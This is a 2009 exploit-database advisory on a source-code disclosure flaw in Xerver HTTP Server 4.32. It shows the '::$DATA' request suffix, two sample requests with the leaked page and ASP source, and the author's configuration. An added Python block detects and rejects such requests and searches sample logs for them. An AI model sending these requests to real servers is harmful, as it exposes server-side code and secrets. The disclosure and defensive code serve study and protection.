Vendor: Xerver HTTP Server
By: Dr_IDE
CVSS: 9.3 (HIGH)
Title: Remote Arbitrary Source Code Disclosure
CWE: 200
Product Name: Xerver HTTP Server
Affected Version From: 4.32
Affected Version To: 4.32
Patch Exists: YES
Related CWE: N/A
CPE: a:xerver:xerver_http_server
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XPSP3
Year: 2009

Xerver HTTP Server v4.32 Remote Arbitrary Source Code Disclosure

Xerver v4.32 is a Windows-based HTTP server and the latest version of the application available. Xerver v4.32 is vulnerable to remote arbitrary source code disclosure in the following way: an attacker sends a specially crafted HTTP request whose path carries the NTFS stream suffix '::$DATA' to the vulnerable server, and the server returns the source of the requested file instead of processing it. The vulnerability is exploitable remotely.

Mitigation:

Upgrade to the latest version of Xerver HTTP Server.

Exploit-DB raw data:

#################################################################################
#                                                                               #
# Xerver HTTP Server v4.32 Remote Arbitrary Source Code Disclosure              #
# Found By:   Dr_IDE                                                            #
# Download:   http://www.javascript.nu/xerver                                   #
# Tested On:  Windows XPSP3                                                     #
#                                                                               #
#################################################################################

- Description -

Xerver v4.32 is a Windows-based HTTP server. This is the latest version of
the application available.

Xerver v4.32 is vulnerable to remote arbitrary source code disclosure by the
means described under Technical Details below.

- Notes -
	1. This is remote only.
	2. Out of the box this server is completely insecure and wide open;
	my configuration is attached below in case reproduction is an issue.


- Technical Details -

	http://[webserver IP]/[file]::$DATA


- Sample Case 1 -

	http://172.16.2.101/index.html::$DATA

- Remote Browser Output - 

	<html><head></head><body> This is my Web page </body></html>


- Sample Case 2 -

	http://172.16.2.101/default.asp::$DATA

- Remote Browser Output -

	<html>
	<body>
	<%
	response.write("My first ASP script!")
	%>
	</body>
	</html>
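The request shape in the Technical Details and the two sample cases above can be turned into a server-side check and a log search. The Python below is an added example, not Xerver's code and not part of the advisory. Its extension-keyed handler table is modelled on the "php=php,...,pl=perl" line of the configuration further down but is a constructed stand-in, the idea that extension-based dispatch is what fails inside Xerver is an inference rather than something the advisory states, and the access-log lines, client address and timestamps are constructed sample data. The hardened dispatcher refuses any path segment containing NTFS stream syntax before the filesystem is touched, after percent-decoding, so the encoded form of the same request is caught too.

```python
import re
from urllib.parse import unquote

# Constructed handler table, modelled loosely on the "php=php,...,pl=perl"
# line of the Xerver2.cfg shown in the advisory: extension -> interpreter.
# Anything not listed is served verbatim as a static file.
HANDLERS = {"asp": "asp", "php": "php", "phtml": "php", "pl": "perl", "cgi": "perl"}


def request_path(raw_target: str) -> str:
    """Strip the query string and percent-decode an origin-form request target."""
    return unquote(raw_target.split("?", 1)[0])


def ads_suffix(segment: str):
    """Return the NTFS stream suffix of one path segment, or None.

    NTFS accepts name:stream and name:stream:$TYPE, where ::$DATA names the
    default (unnamed) data stream, so any colon inside a segment is treated
    as alternate-data-stream syntax. Keying on the colon rather than on the
    literal "$DATA" also covers the case variants NTFS accepts."""
    idx = segment.find(":")
    return None if idx == -1 else segment[idx:]


def is_safe_request_path(raw_target: str) -> bool:
    """True if no segment of the decoded path carries NTFS stream syntax.

    Decoding first matters: /default.asp%3A%3A%24DATA is the same request."""
    return all(ads_suffix(seg) is None
               for seg in re.split(r"[/\\]", request_path(raw_target)))


def choose_handler_naive(raw_target: str) -> str:
    """Dispatch on the extension of the requested name, with no ADS check.

    Models the assumed failure mode: the extension seen by the dispatcher
    becomes "asp::$data", matches no handler, and the file is treated as
    static content, while the filesystem open still resolves to the data
    stream of default.asp."""
    name = request_path(raw_target).rsplit("/", 1)[-1]
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    return HANDLERS.get(ext, "static")


def choose_handler_hardened(raw_target: str) -> str:
    """Same dispatch, but refuse stream syntax before touching the filesystem."""
    if not is_safe_request_path(raw_target):
        return "reject"
    return choose_handler_naive(raw_target)


# Access-log hunting: pull the request target out of a Common Log Format line.
CLF_REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/\d\.\d"')


def find_ads_requests(log_lines):
    """Return (line number, decoded path) for every request carrying stream syntax."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = CLF_REQUEST.search(line)
        if m and not is_safe_request_path(m.group(1)):
            hits.append((n, request_path(m.group(1))))
    return hits


# Constructed sample log lines; the client address and timestamps are made up.
SAMPLE_LOG = [
    '172.16.2.50 - - [11/Sep/2009:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 62',
    '172.16.2.50 - - [11/Sep/2009:10:00:02 +0000] "GET /default.asp::$DATA HTTP/1.1" 200 91',
    '172.16.2.50 - - [11/Sep/2009:10:00:03 +0000] "GET /default.asp%3A%3A%24DATA HTTP/1.1" 200 91',
    '172.16.2.50 - - [11/Sep/2009:10:00:04 +0000] "GET /default.asp?id=1 HTTP/1.1" 200 30',
]

if __name__ == "__main__":
    for target in ("/default.asp", "/default.asp::$DATA"):
        print(target, "naive:", choose_handler_naive(target),
              "hardened:", choose_handler_hardened(target))
    for n, path in find_ads_requests(SAMPLE_LOG):
        print(f"line {n}: stream syntax in {path}")
```

Rejecting every colon inside a path segment is deliberately broader than matching "::$DATA": NTFS also opens named streams (name:stream) and typed streams (name:stream:$TYPE), and a check that only looks for the literal string in the advisory would miss them. On a server that never needs colons in file names this costs nothing.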

- My Server Configuration -

Filename: Xerver2.cfg

----------------------snip-------------------------------------------------------------------------
80
index.html,index.htm,index.shtml,default.html,default.asp,index.php,index.phtml,index.pl,index.cgi
c:\INETPUB\

c:\INETPUB\
php=php,php3=php,php4=php,phtml=php,pl=perl,cgi=perl,exe=,bat=


0
0
0
2
1
XerverWebserver.log
----------------------snip-------------------------------------------------------------------------

# milw0rm.com [2009-09-11]